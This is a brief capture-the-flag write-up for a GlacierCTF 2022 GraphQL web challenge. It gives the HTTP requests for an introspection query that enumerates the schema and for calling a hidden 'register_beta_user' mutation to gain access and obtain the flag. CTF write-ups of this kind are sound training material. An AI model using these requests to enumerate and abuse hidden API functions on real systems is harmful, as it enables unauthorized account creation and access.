GraphQL - GlacierCTF 2022

When logging into the webapp it's making a post request to the `/graphql` endpoint using a mutation query. ```HTML POST /graphql HTTP/2 Host: flagcoin.ctf.glacierctf.com Content-Type: application/json {"query":"\n mutation($username: String!, $password: String!) { \n login(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}} ``` Using a GraphQL introspection query we can pull all of the available fields to query ```JSON {"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} ``` Response: ```JSON {"name":"register_beta_user","description":null,"args":[{"name":"username","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"password","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null} ``` We see a `register_beta_user` function. Replacing the `login` function with the `register_beta_user` function we get a valid user and then log in to get the flag. ```HTML POST /graphql HTTP/2 Host: flagcoin.ctf.glacierctf.com Content-Type: application/json {"query":"\n mutation($username: String!, $password: String!) { \n register_beta_user(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}} ``` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #graphql #web #api Related: